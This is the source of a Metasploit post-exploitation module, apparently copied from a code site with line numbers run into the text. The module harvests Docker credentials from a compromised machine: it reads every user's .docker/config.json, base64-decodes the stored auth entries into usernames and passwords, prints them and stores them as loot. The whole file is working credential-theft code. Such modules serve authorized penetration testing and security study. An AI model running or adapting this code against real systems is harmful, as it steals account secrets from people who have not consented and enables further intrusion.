Path: blob/master/modules/post/multi/gather/docker_creds.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'json'67class MetasploitModule < Msf::Post8include Msf::Post::File9include Msf::Post::Unix1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Multi Gather Docker Credentials Collection',16'Description' => %q{17This module will collect the contents of all users' .docker directories on the targeted18machine. If the user has already push to docker hub, chances are that the password was19saved in base64 (default behavior).20},21'License' => MSF_LICENSE,22'Author' => ['Flibustier'],23'Platform' => %w[bsd linux osx unix],24'SessionTypes' => ['shell'],25'Notes' => {26'Stability' => [CRASH_SAFE],27'SideEffects' => [],28'Reliability' => []29}30)31)32end3334# This module is largely based on gpg_creds.rb.3536def run37print_status('Finding .docker directories')38paths = enum_user_directories.map { |d| d + '/.docker' }39# Array#select! is only in 1.940paths = paths.select { |d| directory?(d) }4142if paths.nil? || paths.empty?43print_error('No users found with a .docker directory')44return45end4647download_loot(paths)48end4950def download_loot(paths)51print_status("Looting #{paths.count} directories")52paths.each do |path|53path.chomp!54file = 'config.json'55target = "#{path}/#{file}"5657if file? target58print_status("Downloading #{target} -> #{file}")59extract(target)60end61end62end6364def extract(target)65file = read_file(target)66parsed = JSON.parse(file)67if parsed['auths']68parsed['auths'].each do |key, value|69vprint_status("key: #{key}")70value.each do |k, v|71next unless k == 'auth'7273plain = Rex::Text.decode_base64(v)74next unless plain.include? ':'7576print_good("Found #{plain}")77username, password = plain.split(':')78credential_data = {79origin_type: :import,80module_fullname: fullname,81filename: target,82workspace_id: myworkspace_id,83service_name: 'docker',84realm_value: key,85realm_key: Metasploit::Model::Realm::Key::WILDCARD,86private_type: :password,87private_data: password,88username: username89}90create_credential(credential_data)9192print_good('Saved credentials')93end94end95else96print_status('No credentials found in config file')97end98end99end100101102